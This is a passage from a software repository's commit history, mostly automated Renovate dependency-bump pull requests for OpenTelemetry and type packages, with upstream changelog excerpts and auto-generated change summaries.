`^0.60.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.58.0/0.60.0) |  |  | | [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.211.0/0.212.0) |  |  | | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.59.0` → `^0.60.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.59.0/0.60.0) |  |  | | [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.57.0` → `^0.58.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.57.0/0.58.0) |  |  | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.57.0` → `^0.59.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.57.0/0.59.0) |  |  | | [@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.5.0` → `2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.5.0/2.5.1) |  |  | | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.211.0/0.212.0) |  |  | | [@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.5.0` → `2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.5.0/2.5.1) |  |  | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/exporter-prometheus)</summary> ### [`v0.212.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/38924cbff2a6e924ce8a2a227d3a72de52fbcd35...ad92be4c2c1094745a85b0b7eeff1444a11b1b4a) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/38924cbff2a6e924ce8a2a227d3a72de52fbcd35...ad92be4c2c1094745a85b0b7eeff1444a11b1b4a) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/host-metrics)</summary> ### [`v0.38.3`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0383-2026-02-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...630937db1575c652201558467ae5c449075f0881) ##### Bug Fixes - **instrumentation-host-metrics:** unpin and update to systeminformation@^5.31.1 ([#​3392](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3392)) ([e4ffdb4](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ffdb43d160ace57420978da9c1855be653abe1)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-graphql)</summary> ### [`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0600-2026-02-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0b33a118f289c0435a241c84c3c3923312fc2b98...630937db1575c652201558467ae5c449075f0881) ##### Features - **instrumentation-graphql:** add parent name in attributes of resolver span ([#​3287](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3287)) ([ea2a90a](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ea2a90a87b5b5a6d29f980a73e61cefa020ab81c)) ### [`v0.59.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0590-2026-02-16) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98) ##### Features - **deps:** update deps matching "@​opentelemetry/\*" ([#​3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383)) ([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-ioredis)</summary> ### [`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0600-2026-02-16) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98) ##### Features - **deps:** update deps matching "@​opentelemetry/\*" ([#​3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383)) ([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.58.0 to ^0.59.0 </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-nestjs-core)</summary> ### [`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0580-2026-02-16) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98) ##### Features - **deps:** update deps matching "@​opentelemetry/\*" ([#​3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383)) ([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-socket.io)</summary> ### [`v0.59.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0590-2026-02-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0b33a118f289c0435a241c84c3c3923312fc2b98...630937db1575c652201558467ae5c449075f0881) ##### Features - **deps:** lock file maintenance ([#​3261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3261)) ([540926b](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/540926bffe713c591163abaf56fbb0e18aaf5b88)) ### [`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0580-2026-02-16) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98) ##### Features - **deps:** update deps matching "@​opentelemetry/\*" ([#​3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383)) ([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.58.0 to ^0.59.0 </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
e1e0ac2345 |
chore: cleanup deps (#14525)
#### PR Dependency Tree * **PR #14525** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Removed an unused development dependency. * Updated dotLottie/Lottie-related dependency versions across packages and replaced a removed player dependency with the new package. * **Refactor** * AI animated icons now re-export from a shared component and are loaded only in the browser, reducing upfront bundle weight and centralizing icon assets. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
046e126054 |
feat: bump typescript (#14507)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Upgraded TypeScript toolchain to v5.9.3 across packages and tooling. * Removed legacy ts-node and migrated developer tooling to newer runtimes (tsx/SWC) where applicable. * **Documentation** * Updated developer CLI docs and runtime behavior notes to reflect the new loader/runtime for running TypeScript files; no changes to public APIs or end-user behavior. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
c2c7dde06c |
chore: bump deps (#14506)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Version bumped to 0.26.3 across the project and Helm charts. * Removed an unused dependency (minimatch) from multiple packages. * Updated build/tooling and packaging metadata, including packaging maker replacement. * Adjusted app release metadata and platform packaging config. * **Tests** * Updated test snapshots to reflect minor presentational styling adjustments. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
2414aa5848 |
feat: improve admin build (#14485)
#### PR Dependency Tree * **PR #14485** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Admin static assets now served under /admin for self-hosted installs * CLI is directly executable from the command line * Build tooling supports a configurable self-hosted public path * Updated admin package script for adding UI components * Added a PostCSS dependency and plugin to the build toolchain for admin builds * **Style** * Switched queue module to a local queuedash stylesheet, added queuedash Tailwind layer, and scoped queuedash styles for the admin UI * **Bug Fixes** * Improved error propagation in the Electron renderer * Migration compatibility to repair a legacy checksum during native storage upgrades * **Tests** * Added tests covering the migration repair flow <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
0de1bd0da8 | feat: bump deps (#14484) | ||
|
|
8ce620e2e6 | chore: bump deps | ||
|
|
a0cf5681c4 |
chore: cleanup images (#14380)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added canary build version support with automatic validation and age-based restrictions for testing pre-release versions. * **Chores** * Enhanced Docker build process with multi-stage builds, image optimization, and memory allocation improvements. * Reorganized dependencies to distinguish development-only packages. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
31f6f209e3 | chore: bump deps | ||
|
|
161eb302fd | chore: bump deps | ||
|
|
403f16b404 | chore: drop old client support (#14369) | ||
|
|
73d4da192d |
chore: bump up @types/sinon version to v21 (#14361)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/sinon](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/sinon) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/sinon)) | [`^17.0.3` → `^21.0.0`](https://renovatebot.com/diffs/npm/@types%2fsinon/17.0.4/21.0.0) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45Mi4xIiwidXBkYXRlZEluVmVyIjoiNDIuOTIuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
0b648f8613 |
chore: bump up @types/nodemailer version to v7 (#14354)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/nodemailer](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/nodemailer) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/nodemailer)) | [`^6.4.17` → `^7.0.0`](https://renovatebot.com/diffs/npm/@types%2fnodemailer/6.4.17/7.0.9) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45Mi4xIiwidXBkYXRlZEluVmVyIjoiNDIuOTIuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
f1a6e409cb |
feat(server): lightweight s3 client (#14348)
#### PR Dependency Tree * **PR #14348** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added a dedicated S3-compatible client package and expanded S3-compatible storage config (endpoint, region, forcePathStyle, requestTimeoutMs, minPartSize, presign options, sessionToken). * Document sync now broadcasts batched/compressed doc updates for more efficient real-time syncing. * **Tests** * New unit and benchmark tests for base64 utilities and S3 multipart listing; updated storage-related tests to match new formats. <sub>✏️ Tip: You can customize this high-level summary in your review settings.</sub> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
888f1f39db | chore: bump deps (#14341) | ||
|
|
69907083f7 |
chore: bump up opentelemetry (#14300)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/core](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-core) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.2.0` → `2.5.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fcore/2.2.0/2.5.0) |  |  | | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.208.0` → `^0.211.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.208.0/0.211.0) |  |  | | [@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.2.0` → `2.5.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.2.0/2.5.0) |  |  | | [@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics)) | [`0.38.0` → `0.38.2`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.38.0/0.38.2) |  |  | | [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.208.0` → `^0.211.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.208.0/0.211.0) |  |  | | [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.56.0` → `^0.58.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.56.0/0.58.0) |  |  | | [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.208.0` → `^0.211.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.208.0/0.211.0) |  |  | | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.57.0` → `^0.59.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.57.0/0.59.0) |  |  | | [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.55.0` → `^0.57.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.55.0/0.57.0) |  |  | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.55.0` → `^0.57.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.55.1/0.57.0) |  |  | | [@opentelemetry/resources](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-resources) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.2.0` → `2.5.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fresources/2.2.0/2.5.0) |  |  | | [@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.2.0` → `2.5.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.2.0/2.5.0) |  |  | | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.208.0` → `^0.211.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.208.0/0.211.0) |  |  | | [@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.2.0` → `2.5.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.2.0/2.5.0) |  |  | | [@opentelemetry/semantic-conventions](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/semantic-conventions) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`1.38.0` → `1.39.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsemantic-conventions/1.38.0/1.39.0) |  |  | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/core)</summary> ### [`v2.5.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#250) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v2.4.0...v2.5.0) ##### 🐛 Bug Fixes - refactor(resources): use runtime check for default service name [#​6257](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6257) [@​overbalance](https://redirect.github.com/overbalance) ##### 🏠 Internal - chore(context-async-hooks): Deprecate `AsyncHooksContextManager` [#​6298](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6298) [@​trentm](https://redirect.github.com/trentm) - chore: fix CODEOWNERS rule ordering [#​6297](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6297) [@​overbalance](https://redirect.github.com/overbalance) - fix(github): fix CODEOWNERS browser package paths [#​6303](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6303) [@​overbalance](https://redirect.github.com/overbalance) - fix(build): update [@​types/node](https://redirect.github.com/types/node) to 18.19.130, remove DOM types from base tsconfig [#​6280](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6280) [@​overbalance](https://redirect.github.com/overbalance) ### [`v2.4.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#240) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v2.3.0...v2.4.0) ##### 🐛 Bug Fixes - fix(sdk-metrics): improve PeriodicExportingMetricReader() constructor input validation [#​6286](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6286) [@​cjihrig](https://redirect.github.com/cjihrig) - fix(core): Avoid using DOM types for otperformance export [#​6278](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6278) [@​samchungy](https://redirect.github.com/samchungy) ##### 🏠 Internal - chore(browser): fix CODEOWNERS paths for browser-related packages - refactor(sdk-metrics): remove Promise.allSettled() ponyfill [#​6277](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6277) [@​cjihrig](https://redirect.github.com/cjihrig) ### [`v2.3.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#230) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v2.2.0...v2.3.0) ##### 🚀 Features - feat(sdk-trace-base): implement on ending in span processor [#​6024](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6024) [@​majanjua-amzn](https://redirect.github.com/majanjua-amzn) - note: this feature is experimental and subject to change ##### 🐛 Bug Fixes - fix(sdk-metrics): remove setImmediate usage in ConsoleMetricExporter [#​6199](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6199) [@​overbalance](https://redirect.github.com/overbalance) ##### 🏠 Internal - refactor(bundler-tests): split webpack tests into webpack-4 and webpack-5 [#​6098](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6098) [@​overbalance](https://redirect.github.com/overbalance) - refactor(sdk-metrics): remove isNotNullish() utility function [#​6151](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6151) [@​cjihrig](https://redirect.github.com/cjihrig) - refactor(sdk-metrics): remove FlatMap() utility function [#​6154](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6154) [@​cjihrig](https://redirect.github.com/cjihrig) - refactor(sdk-metrics): simplify AllowList and DenyList processors [#​6159](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6159) [@​cjihrig](https://redirect.github.com/cjihrig) - chore: disallow constructor parameter property syntax [#​6187](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6187) [@​legendecas](https://redirect.github.com/legendecas) - refactor(sdk-metrics): use test() instead of match() in isValidName() [#​6205](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6205) [@​cjihrig](https://redirect.github.com/cjihrig) - refactor(core): remove TimeOriginLegacy Safari <15 fallback [#​6235](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6235) [@​overbalance](https://redirect.github.com/overbalance) - chore: remove backcompat workspace [#​6238](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6238) [@​overbalance](https://redirect.github.com/overbalance) - refactor(core,resources): consolidate platform-specific code [#​6208](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6208) [@​overbalance](https://redirect.github.com/overbalance) - test(api): remove unnecessary conditional [#​6241](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6241) [@​cjihrig](https://redirect.github.com/cjihrig) - refactor(api): remove several reverse() calls [#​6252](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6252) [@​cjihrig](https://redirect.github.com/cjihrig) - refactor(api): remove unnecessary map() call [#​6251](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6251) [@​cjihrig](https://redirect.github.com/cjihrig) - chore: add zed to gitignore [#​6258](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6258) [@​overbalance](https://redirect.github.com/overbalance) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/host-metrics)</summary> ### [`v0.38.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0382-2026-01-21) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/c84212cca7f010b80747cccb9942474e0459df6e...7a5f3c0a09b6a2d32c712b2962b95137c906a016) ##### Bug Fixes - **deps:** update dependency systeminformation to v5.30.3 ([#​3335](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3335)) ([9af0086](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/9af008622326464fa3076127bbab34a1dc0d10aa)) ### [`v0.38.1`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0381-2026-01-14) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/66935ac724cc271f70028035e534d47a4dfbcf12...c84212cca7f010b80747cccb9942474e0459df6e) ##### Bug Fixes - **deps:** update dependency systeminformation to v5.27.14 \[security] ([#​3308](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3308)) ([c2d0bc5](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c2d0bc5b1928e2147fe44c1a5a8b826f30b8f7de)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-graphql)</summary> ### [`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0580-2026-01-21) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/c84212cca7f010b80747cccb9942474e0459df6e...7a5f3c0a09b6a2d32c712b2962b95137c906a016) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3353](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3353)) ([a56bbdc](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/a56bbdc34a5015b0a5fdcb7522f168cfc90ba95c)) ### [`v0.57.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0570-2026-01-14) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/94e5b7da4500459e38e8d4dfda93542f22159600...c84212cca7f010b80747cccb9942474e0459df6e) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3332](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3332)) ([925a150](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/925a1501ce0d082c6845d36e7c964e625ee3de0c)) - **deps:** update deps matching '@​opentelemetry/\*' ([#​3340](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3340)) ([2954943](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/29549434e7204b03d58635eb20352efee0e797d4)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-ioredis)</summary> ### [`v0.59.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0590-2026-01-21) 